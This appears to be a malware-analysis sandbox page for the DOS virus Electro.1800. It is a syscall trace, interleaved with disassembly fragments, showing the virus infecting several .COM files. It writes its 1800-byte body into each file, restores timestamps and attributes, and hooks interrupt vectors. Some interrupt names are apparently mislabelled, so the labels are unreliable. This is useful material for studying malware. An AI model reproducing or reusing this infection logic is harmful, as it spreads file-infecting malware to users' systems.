Sample viewer

vx.netlux.org/Virus.DOS.Electro.1800

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:31:00.039130105Z 53 PC: 12ae3 | Get interrupt vector (Interrupt = '3' AKA 'Auxiliary input')
2018-12-17T22:31:00.041353068Z 53 PC: 12af1 | Get interrupt vector (Interrupt = '32' AKA 'Reserved')
2018-12-17T22:31:00.042773943Z 37 PC: 12afa | Set interrupt vector (Interrupt = '3' AKA 'Auxiliary input')
2018-12-17T22:31:00.044029802Z 47 PC: 12b5b | Get disk transfer address
2018-12-17T22:31:00.045604756Z 26 PC: 12b69 | Set disk transfer address
2018-12-17T22:31:00.047226716Z 71 PC: 12b73 | Get current directory
2018-12-17T22:31:00.050013554Z 53 PC: 12b79 | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T22:31:00.051174397Z 37 PC: 12b8c | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T22:31:00.053271154Z 78 PC: 12d5f | Find first file
2018-12-17T22:31:00.061718672Z 67 PC: 12d86 | Get or set file attributes
2018-12-17T22:31:00.077966472Z 61 PC: 12d8f | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:31:00.086017617Z 63 PC: 12da0 | Read file or device (Read 28 bytes on handle 5)
2018-12-17T22:31:00.093332592Z 66 PC: 130c1 | Move file pointer
2018-12-17T22:31:00.095356009Z 44 PC: 12f17 | Get time 0x12f17: mov word ptr cs:[bp + 0x804], cx
0x12f1c: mov word ptr cs:[bp + 0x806], dx
0x12f21: mov word ptr cs:[bp + 0x80a], 0
0x12f28: call 0x12fef
0x12f2b: mov ax, word ptr cs:[bp + 0x806]
0x12f30: mov cx, 1
0x12f33: mov si, 0x80a
0x12f36: call 0x12fba
0x12f39: cmp word ptr cs:[bp + 0x80a], 0
0x12f3f: je 0x12f28
0x12f41: mov cx, 0x708
0x12f44: lea si, word ptr [bp + 0x100]
0x12f48: lea di, word ptr [bp + 0x89e]
0x12f4c: cld
0x12f4d: rep movsb byte ptr es:[di], byte ptr [si]
0x12f4f: mov ax, word ptr cs:[bp + 0x804]
0x12f54: mov cx, 0x326
0x12f57: lea si, word ptr [bp + 0x1b8]
0x12f5b: add si, 0x79e
0x12f5f: lea di, word ptr [bp + 0x18a]
2018-12-17T22:31:00.099094536Z 44 PC: 1301f | Get time 0x1301f: push bx
0x13020: xchg dx, bx
0x13022: xor ah, ah
0x13024: mov cx, 5
0x13027: call 0x130b4
0x1302a: mov dl, 0x12
0x1302c: div dl
0x1302e: mov dl, 2
0x13030: mul dl
0x13032: push ax
0x13033: lea si, word ptr [bp + 0x7e0]
0x13037: add si, ax
0x13039: call 0x130b4
0x1303c: mov dl, 0x10
0x1303e: div dl
0x13040: mov dl, 3
0x13042: mul dl
0x13044: push ax
0x13045: lea di, word ptr [bp + 0x677]
0x13049: add di, ax
2018-12-17T22:31:00.109828348Z 64 PC: 12fb3 | Write file or device (Write 1800 bytes on handle 5)
2018-12-17T22:31:00.118927315Z 66 PC: 130c1 | Move file pointer
2018-12-17T22:31:00.121850794Z 64 PC: 12e5c | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:31:00.128630159Z 87 PC: 130b3 | Get or set file date and time
2018-12-17T22:31:00.130681816Z 62 PC: 12e22 | Close file
2018-12-17T22:31:00.139218711Z 67 PC: 12e30 | Get or set file attributes
2018-12-17T22:31:00.144904244Z 79 PC: 12d68 | Find next file
2018-12-17T22:31:00.148104019Z 67 PC: 12d86 | Get or set file attributes
2018-12-17T22:31:00.159514822Z 61 PC: 12d8f | Open file (Filename = 'PRINT.COM')
2018-12-17T22:31:00.164976463Z 63 PC: 12da0 | Read file or device (Read 28 bytes on handle 5)
2018-12-17T22:31:00.169253537Z 66 PC: 130c1 | Move file pointer
2018-12-17T22:31:00.170830795Z 62 PC: 12e22 | Close file
2018-12-17T22:31:00.174577194Z 67 PC: 12e30 | Get or set file attributes
2018-12-17T22:31:00.17977172Z 79 PC: 12d68 | Find next file
2018-12-17T22:31:00.183030494Z 67 PC: 12d86 | Get or set file attributes
2018-12-17T22:31:00.197480715Z 61 PC: 12d8f | Open file (Filename = 'HELLO.COM')
2018-12-17T22:31:00.204037656Z 63 PC: 12da0 | Read file or device (Read 28 bytes on handle 5)
2018-12-17T22:31:00.211587881Z 66 PC: 130c1 | Move file pointer
2018-12-17T22:31:00.214935653Z 44 PC: 12f17 | Get time 0x12f17: mov word ptr cs:[bp + 0x804], cx
0x12f1c: mov word ptr cs:[bp + 0x806], dx
0x12f21: mov word ptr cs:[bp + 0x80a], 0
0x12f28: call 0x12fef
0x12f2b: mov ax, word ptr cs:[bp + 0x806]
0x12f30: mov cx, 1
0x12f33: mov si, 0x80a
0x12f36: call 0x12fba
0x12f39: cmp word ptr cs:[bp + 0x80a], 0
0x12f3f: je 0x12f28
0x12f41: mov cx, 0x708
0x12f44: lea si, word ptr [bp + 0x100]
0x12f48: lea di, word ptr [bp + 0x89e]
0x12f4c: cld
0x12f4d: rep movsb byte ptr es:[di], byte ptr [si]
0x12f4f: mov ax, word ptr cs:[bp + 0x804]
0x12f54: mov cx, 0x326
0x12f57: lea si, word ptr [bp + 0x1b8]
0x12f5b: add si, 0x79e
0x12f5f: lea di, word ptr [bp + 0x18a]
2018-12-17T22:31:00.217390582Z 44 PC: 1301f | Get time 0x1301f: push bx
0x13020: xchg dx, bx
0x13022: xor ah, ah
0x13024: mov cx, 5
0x13027: call 0x130b4
0x1302a: mov dl, 0x12
0x1302c: div dl
0x1302e: mov dl, 2
0x13030: mul dl
0x13032: push ax
0x13033: lea si, word ptr [bp + 0x7e0]
0x13037: add si, ax
0x13039: call 0x130b4
0x1303c: mov dl, 0x10
0x1303e: div dl
0x13040: mov dl, 3
0x13042: mul dl
0x13044: push ax
0x13045: lea di, word ptr [bp + 0x677]
0x13049: add di, ax
2018-12-17T22:31:00.226295387Z 64 PC: 12fb3 | Write file or device (Write 1800 bytes on handle 5)
2018-12-17T22:31:00.235772987Z 66 PC: 130c1 | Move file pointer
2018-12-17T22:31:00.237493792Z 64 PC: 12e5c | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:31:00.244586256Z 87 PC: 130b3 | Get or set file date and time
2018-12-17T22:31:00.24749588Z 62 PC: 12e22 | Close file
2018-12-17T22:31:00.255430494Z 67 PC: 12e30 | Get or set file attributes
2018-12-17T22:31:00.260389411Z 79 PC: 12d68 | Find next file
2018-12-17T22:31:00.264382205Z 67 PC: 12d86 | Get or set file attributes
2018-12-17T22:31:00.274182655Z 61 PC: 12d8f | Open file (Filename = 'PHANG.COM')
2018-12-17T22:31:00.280970425Z 63 PC: 12da0 | Read file or device (Read 28 bytes on handle 5)
2018-12-17T22:31:00.288497834Z 66 PC: 130c1 | Move file pointer
2018-12-17T22:31:00.29052197Z 44 PC: 12f17 | Get time 0x12f17: mov word ptr cs:[bp + 0x804], cx
0x12f1c: mov word ptr cs:[bp + 0x806], dx
0x12f21: mov word ptr cs:[bp + 0x80a], 0
0x12f28: call 0x12fef
0x12f2b: mov ax, word ptr cs:[bp + 0x806]
0x12f30: mov cx, 1
0x12f33: mov si, 0x80a
0x12f36: call 0x12fba
0x12f39: cmp word ptr cs:[bp + 0x80a], 0
0x12f3f: je 0x12f28
0x12f41: mov cx, 0x708
0x12f44: lea si, word ptr [bp + 0x100]
0x12f48: lea di, word ptr [bp + 0x89e]
0x12f4c: cld
0x12f4d: rep movsb byte ptr es:[di], byte ptr [si]
0x12f4f: mov ax, word ptr cs:[bp + 0x804]
0x12f54: mov cx, 0x326
0x12f57: lea si, word ptr [bp + 0x1b8]
0x12f5b: add si, 0x79e
0x12f5f: lea di, word ptr [bp + 0x18a]
2018-12-17T22:31:00.292935436Z 44 PC: 1301f | Get time 0x1301f: push bx
0x13020: xchg dx, bx
0x13022: xor ah, ah
0x13024: mov cx, 5
0x13027: call 0x130b4
0x1302a: mov dl, 0x12
0x1302c: div dl
0x1302e: mov dl, 2
0x13030: mul dl
0x13032: push ax
0x13033: lea si, word ptr [bp + 0x7e0]
0x13037: add si, ax
0x13039: call 0x130b4
0x1303c: mov dl, 0x10
0x1303e: div dl
0x13040: mov dl, 3
0x13042: mul dl
0x13044: push ax
0x13045: lea di, word ptr [bp + 0x677]
0x13049: add di, ax
2018-12-17T22:31:00.303385731Z 64 PC: 12fb3 | Write file or device (Write 1800 bytes on handle 5)
2018-12-17T22:31:00.311900185Z 66 PC: 130c1 | Move file pointer
2018-12-17T22:31:00.313257325Z 64 PC: 12e5c | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:31:00.320051673Z 87 PC: 130b3 | Get or set file date and time
2018-12-17T22:31:00.321800118Z 62 PC: 12e22 | Close file
2018-12-17T22:31:00.329306016Z 67 PC: 12e30 | Get or set file attributes
2018-12-17T22:31:00.333867593Z 79 PC: 12d68 | Find next file
2018-12-17T22:31:00.337297845Z 67 PC: 12d86 | Get or set file attributes
2018-12-17T22:31:00.347068096Z 61 PC: 12d8f | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:31:00.353690071Z 63 PC: 12da0 | Read file or device (Read 28 bytes on handle 5)
2018-12-17T22:31:00.36042413Z 66 PC: 130c1 | Move file pointer
2018-12-17T22:31:00.362067056Z 44 PC: 12f17 | Get time 0x12f17: mov word ptr cs:[bp + 0x804], cx
0x12f1c: mov word ptr cs:[bp + 0x806], dx
0x12f21: mov word ptr cs:[bp + 0x80a], 0
0x12f28: call 0x12fef
0x12f2b: mov ax, word ptr cs:[bp + 0x806]
0x12f30: mov cx, 1
0x12f33: mov si, 0x80a
0x12f36: call 0x12fba
0x12f39: cmp word ptr cs:[bp + 0x80a], 0
0x12f3f: je 0x12f28
0x12f41: mov cx, 0x708
0x12f44: lea si, word ptr [bp + 0x100]
0x12f48: lea di, word ptr [bp + 0x89e]
0x12f4c: cld
0x12f4d: rep movsb byte ptr es:[di], byte ptr [si]
0x12f4f: mov ax, word ptr cs:[bp + 0x804]
0x12f54: mov cx, 0x326
0x12f57: lea si, word ptr [bp + 0x1b8]
0x12f5b: add si, 0x79e
0x12f5f: lea di, word ptr [bp + 0x18a]
2018-12-17T22:31:00.364435263Z 44 PC: 1301f | Get time 0x1301f: push bx
0x13020: xchg dx, bx
0x13022: xor ah, ah
0x13024: mov cx, 5
0x13027: call 0x130b4
0x1302a: mov dl, 0x12
0x1302c: div dl
0x1302e: mov dl, 2
0x13030: mul dl
0x13032: push ax
0x13033: lea si, word ptr [bp + 0x7e0]
0x13037: add si, ax
0x13039: call 0x130b4
0x1303c: mov dl, 0x10
0x1303e: div dl
0x13040: mov dl, 3
0x13042: mul dl
0x13044: push ax
0x13045: lea di, word ptr [bp + 0x677]
0x13049: add di, ax
2018-12-17T22:31:00.374806963Z 64 PC: 12fb3 | Write file or device (Write 1800 bytes on handle 5)
2018-12-17T22:31:00.383263983Z 66 PC: 130c1 | Move file pointer
2018-12-17T22:31:00.384827798Z 64 PC: 12e5c | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:31:00.392014281Z 87 PC: 130b3 | Get or set file date and time
2018-12-17T22:31:00.393669865Z 62 PC: 12e22 | Close file
2018-12-17T22:31:00.400938594Z 67 PC: 12e30 | Get or set file attributes
2018-12-17T22:31:00.406275943Z 79 PC: 12d68 | Find next file
2018-12-17T22:31:00.408687538Z 67 PC: 12d86 | Get or set file attributes
2018-12-17T22:31:00.41778972Z 61 PC: 12d8f | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:31:00.424576526Z 63 PC: 12da0 | Read file or device (Read 28 bytes on handle 5)
2018-12-17T22:31:00.431079446Z 66 PC: 130c1 | Move file pointer
2018-12-17T22:31:00.432332439Z 44 PC: 12f17 | Get time 0x12f17: mov word ptr cs:[bp + 0x804], cx
0x12f1c: mov word ptr cs:[bp + 0x806], dx
0x12f21: mov word ptr cs:[bp + 0x80a], 0
0x12f28: call 0x12fef
0x12f2b: mov ax, word ptr cs:[bp + 0x806]
0x12f30: mov cx, 1
0x12f33: mov si, 0x80a
0x12f36: call 0x12fba
0x12f39: cmp word ptr cs:[bp + 0x80a], 0
0x12f3f: je 0x12f28
0x12f41: mov cx, 0x708
0x12f44: lea si, word ptr [bp + 0x100]
0x12f48: lea di, word ptr [bp + 0x89e]
0x12f4c: cld
0x12f4d: rep movsb byte ptr es:[di], byte ptr [si]
0x12f4f: mov ax, word ptr cs:[bp + 0x804]
0x12f54: mov cx, 0x326
0x12f57: lea si, word ptr [bp + 0x1b8]
0x12f5b: add si, 0x79e
0x12f5f: lea di, word ptr [bp + 0x18a]
2018-12-17T22:31:00.434801265Z 44 PC: 1301f | Get time 0x1301f: push bx
0x13020: xchg dx, bx
0x13022: xor ah, ah
0x13024: mov cx, 5
0x13027: call 0x130b4
0x1302a: mov dl, 0x12
0x1302c: div dl
0x1302e: mov dl, 2
0x13030: mul dl
0x13032: push ax
0x13033: lea si, word ptr [bp + 0x7e0]
0x13037: add si, ax
0x13039: call 0x130b4
0x1303c: mov dl, 0x10
0x1303e: div dl
0x13040: mov dl, 3
0x13042: mul dl
0x13044: push ax
0x13045: lea di, word ptr [bp + 0x677]
0x13049: add di, ax
2018-12-17T22:31:00.443753062Z 64 PC: 12fb3 | Write file or device (Write 1800 bytes on handle 5)
2018-12-17T22:31:00.452274267Z 66 PC: 130c1 | Move file pointer
2018-12-17T22:31:00.454540221Z 64 PC: 12e5c | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:31:00.461393638Z 87 PC: 130b3 | Get or set file date and time
2018-12-17T22:31:00.463101952Z 62 PC: 12e22 | Close file
2018-12-17T22:31:00.471514232Z 67 PC: 12e30 | Get or set file attributes
2018-12-17T22:31:00.476345596Z 79 PC: 12d68 | Find next file
2018-12-17T22:31:00.479359593Z 67 PC: 12d86 | Get or set file attributes
2018-12-17T22:31:00.490373901Z 61 PC: 12d8f | Open file (Filename = 'PAH.COM')
2018-12-17T22:31:00.497617625Z 63 PC: 12da0 | Read file or device (Read 28 bytes on handle 5)
2018-12-17T22:31:00.505226921Z 66 PC: 130c1 | Move file pointer
2018-12-17T22:31:00.508162779Z 44 PC: 12f17 | Get time 0x12f17: mov word ptr cs:[bp + 0x804], cx
0x12f1c: mov word ptr cs:[bp + 0x806], dx
0x12f21: mov word ptr cs:[bp + 0x80a], 0
0x12f28: call 0x12fef
0x12f2b: mov ax, word ptr cs:[bp + 0x806]
0x12f30: mov cx, 1
0x12f33: mov si, 0x80a
0x12f36: call 0x12fba
0x12f39: cmp word ptr cs:[bp + 0x80a], 0
0x12f3f: je 0x12f28
0x12f41: mov cx, 0x708
0x12f44: lea si, word ptr [bp + 0x100]
0x12f48: lea di, word ptr [bp + 0x89e]
0x12f4c: cld
0x12f4d: rep movsb byte ptr es:[di], byte ptr [si]
0x12f4f: mov ax, word ptr cs:[bp + 0x804]
0x12f54: mov cx, 0x326
0x12f57: lea si, word ptr [bp + 0x1b8]
0x12f5b: add si, 0x79e
0x12f5f: lea di, word ptr [bp + 0x18a]
2018-12-17T22:31:00.510586887Z 44 PC: 1301f | Get time 0x1301f: push bx
0x13020: xchg dx, bx
0x13022: xor ah, ah
0x13024: mov cx, 5
0x13027: call 0x130b4
0x1302a: mov dl, 0x12
0x1302c: div dl
0x1302e: mov dl, 2
0x13030: mul dl
0x13032: push ax
0x13033: lea si, word ptr [bp + 0x7e0]
0x13037: add si, ax
0x13039: call 0x130b4
0x1303c: mov dl, 0x10
0x1303e: div dl
0x13040: mov dl, 3
0x13042: mul dl
0x13044: push ax
0x13045: lea di, word ptr [bp + 0x677]
0x13049: add di, ax
2018-12-17T22:31:00.520338636Z 64 PC: 12fb3 | Write file or device (Write 1800 bytes on handle 5)
2018-12-17T22:31:00.529253162Z 66 PC: 130c1 | Move file pointer
2018-12-17T22:31:00.531550146Z 64 PC: 12e5c | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:31:00.538006518Z 87 PC: 130b3 | Get or set file date and time
2018-12-17T22:31:00.540143397Z 62 PC: 12e22 | Close file
2018-12-17T22:31:00.547990184Z 67 PC: 12e30 | Get or set file attributes
2018-12-17T22:31:00.552649186Z 79 PC: 12d68 | Find next file
2018-12-17T22:31:00.555521063Z 67 PC: 12d86 | Get or set file attributes
2018-12-17T22:31:00.56601719Z 61 PC: 12d8f | Open file (Filename = 'TEST.COM')
2018-12-17T22:31:00.572811777Z 63 PC: 12da0 | Read file or device (Read 28 bytes on handle 5)
2018-12-17T22:31:00.57531632Z 66 PC: 130c1 | Move file pointer
2018-12-17T22:31:00.577340214Z 62 PC: 12e22 | Close file
2018-12-17T22:31:00.578930483Z 67 PC: 12e30 | Get or set file attributes
2018-12-17T22:31:00.58378576Z 79 PC: 12d68 | Find next file
2018-12-17T22:31:00.587358559Z 78 PC: 12d5f | Find first file
2018-12-17T22:31:00.593985789Z 78 PC: 12d5f | Find first file
2018-12-17T22:31:00.600594252Z 59 PC: 12b98 | Change current directory
2018-12-17T22:31:00.61027674Z 44 PC: 12b9e | Get time 0x12b9e: push dx
0x12b9f: xchg dl, al
0x12ba1: add si, ax
0x12ba3: mov al, byte ptr [si]
0x12ba5: cmp al, 0x5a
0x12ba7: jbe 0x12bad
0x12ba9: sub al, 0x20
0x12bab: jmp 0x12ba5
0x12bad: cmp al, 0x40
0x12baf: jg 0x12bb7
0x12bb1: pop dx
0x12bb2: push dx
0x12bb3: add al, dh
0x12bb5: jmp 0x12bad
0x12bb7: mov byte ptr cs:[bp + 0x7b8], al
0x12bbc: cmp byte ptr cs:[bp + 0x7b8], 0x5a
0x12bc2: jg 0x12bf8
0x12bc4: mov ah, 0x4e
0x12bc6: mov cx, 0x10
0x12bc9: lea dx, word ptr [bp + 0x7b8]
2018-12-17T22:31:00.612442084Z 78 PC: 12bcf | Find first file
2018-12-17T22:31:00.622992951Z 78 PC: 12bcf | Find first file
2018-12-17T22:31:00.629364532Z 59 PC: 12c5e | Change current directory
2018-12-17T22:31:00.635121406Z 78 PC: 12d5f | Find first file
2018-12-17T22:31:00.641474202Z 67 PC: 12d86 | Get or set file attributes
2018-12-17T22:31:00.652659696Z 61 PC: 12d8f | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:31:00.660229296Z 63 PC: 12da0 | Read file or device (Read 28 bytes on handle 5)
2018-12-17T22:31:00.666468088Z 66 PC: 130c1 | Move file pointer
2018-12-17T22:31:00.668718169Z 62 PC: 12e22 | Close file
2018-12-17T22:31:00.67078923Z 67 PC: 12e30 | Get or set file attributes
2018-12-17T22:31:00.675404957Z 79 PC: 12d68 | Find next file
2018-12-17T22:31:00.678835279Z 67 PC: 12d86 | Get or set file attributes
2018-12-17T22:31:00.691812376Z 61 PC: 12d8f | Open file (Filename = 'PRINT.COM')
2018-12-17T22:31:00.698432184Z 63 PC: 12da0 | Read file or device (Read 28 bytes on handle 5)
2018-12-17T22:31:00.706004204Z 66 PC: 130c1 | Move file pointer
2018-12-17T22:31:00.707541797Z 62 PC: 12e22 | Close file
2018-12-17T22:31:00.711211932Z 67 PC: 12e30 | Get or set file attributes
2018-12-17T22:31:00.71909862Z 79 PC: 12d68 | Find next file
2018-12-17T22:31:00.723017871Z 67 PC: 12d86 | Get or set file attributes
2018-12-17T22:31:00.732912216Z 61 PC: 12d8f | Open file (Filename = 'HELLO.COM')
2018-12-17T22:31:00.739861274Z 63 PC: 12da0 | Read file or device (Read 28 bytes on handle 5)
2018-12-17T22:31:00.74732305Z 66 PC: 130c1 | Move file pointer
2018-12-17T22:31:00.749177657Z 62 PC: 12e22 | Close file
2018-12-17T22:31:00.751116852Z 67 PC: 12e30 | Get or set file attributes
2018-12-17T22:31:00.756850395Z 79 PC: 12d68 | Find next file
2018-12-17T22:31:00.758793769Z 67 PC: 12d86 | Get or set file attributes
2018-12-17T22:31:00.765999868Z 61 PC: 12d8f | Open file (Filename = 'PHANG.COM')
2018-12-17T22:31:00.773282867Z 63 PC: 12da0 | Read file or device (Read 28 bytes on handle 5)
2018-12-17T22:31:00.779557332Z 66 PC: 130c1 | Move file pointer
2018-12-17T22:31:00.781714913Z 62 PC: 12e22 | Close file
2018-12-17T22:31:00.783972977Z 67 PC: 12e30 | Get or set file attributes
2018-12-17T22:31:00.788571912Z 79 PC: 12d68 | Find next file
2018-12-17T22:31:00.791257117Z 67 PC: 12d86 | Get or set file attributes
2018-12-17T22:31:00.800144616Z 61 PC: 12d8f | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:31:00.806981754Z 63 PC: 12da0 | Read file or device (Read 28 bytes on handle 5)
2018-12-17T22:31:00.813511137Z 66 PC: 130c1 | Move file pointer
2018-12-17T22:31:00.816367522Z 62 PC: 12e22 | Close file
2018-12-17T22:31:00.818531116Z 67 PC: 12e30 | Get or set file attributes
2018-12-17T22:31:00.824151079Z 79 PC: 12d68 | Find next file
2018-12-17T22:31:00.827652269Z 67 PC: 12d86 | Get or set file attributes
2018-12-17T22:31:00.837228403Z 61 PC: 12d8f | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:31:00.841910905Z 63 PC: 12da0 | Read file or device (Read 28 bytes on handle 5)
2018-12-17T22:31:00.847428209Z 66 PC: 130c1 | Move file pointer
2018-12-17T22:31:00.848834015Z 62 PC: 12e22 | Close file
2018-12-17T22:31:00.850548207Z 67 PC: 12e30 | Get or set file attributes
2018-12-17T22:31:00.855251776Z 79 PC: 12d68 | Find next file
2018-12-17T22:31:00.858013521Z 67 PC: 12d86 | Get or set file attributes
2018-12-17T22:31:00.867492624Z 61 PC: 12d8f | Open file (Filename = 'PAH.COM')
2018-12-17T22:31:00.87432232Z 63 PC: 12da0 | Read file or device (Read 28 bytes on handle 5)
2018-12-17T22:31:00.880524162Z 66 PC: 130c1 | Move file pointer
2018-12-17T22:31:00.882526034Z 62 PC: 12e22 | Close file
2018-12-17T22:31:00.884356127Z 67 PC: 12e30 | Get or set file attributes
2018-12-17T22:31:00.889427382Z 79 PC: 12d68 | Find next file
2018-12-17T22:31:00.892272771Z 67 PC: 12d86 | Get or set file attributes
2018-12-17T22:31:00.902150021Z 61 PC: 12d8f | Open file (Filename = 'TEST.COM')
2018-12-17T22:31:00.908567244Z 63 PC: 12da0 | Read file or device (Read 28 bytes on handle 5)
2018-12-17T22:31:00.914752153Z 66 PC: 130c1 | Move file pointer
2018-12-17T22:31:00.916408162Z 62 PC: 12e22 | Close file
2018-12-17T22:31:00.918144197Z 67 PC: 12e30 | Get or set file attributes
2018-12-17T22:31:00.922887137Z 79 PC: 12d68 | Find next file
2018-12-17T22:31:00.92568713Z 78 PC: 12d5f | Find first file
2018-12-17T22:31:00.93154552Z 78 PC: 12d5f | Find first file
2018-12-17T22:31:00.937578824Z 59 PC: 12c7d | Change current directory
2018-12-17T22:31:00.946873956Z 44 PC: 12c81 | Get time 0x12c81: cmp dl, 1
0x12c84: jae 0x12c8e
0x12c86: mov ah, 9
0x12c88: lea dx, word ptr [bp + 0x77e]
0x12c8c: int 0x21
0x12c8e: push ds
0x12c8f: mov ah, 0x1a
0x12c91: pop dx
0x12c92: pop ds
0x12c93: int 0x21
0x12c95: mov ax, 0x2524
0x12c98: mov dx, word ptr cs:[bp + 0x812]
0x12c9d: mov ds, word ptr cs:[bp + 0x810]
0x12ca2: int 0x21
0x12ca4: mov ax, 0x2503
0x12ca7: mov dx, word ptr cs:[bp + 0x80e]
0x12cac: mov ds, word ptr cs:[bp + 0x80c]
0x12cb1: int 0x21
0x12cb3: pop ds
0x12cb4: in al, 0x21
2018-12-17T22:31:00.949087518Z 26 PC: 12c95 | Set disk transfer address
2018-12-17T22:31:00.951287137Z 37 PC: 12ca4 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T22:31:00.952639745Z 37 PC: 12cb3 | Set interrupt vector (Interrupt = '3' AKA 'Auxiliary input')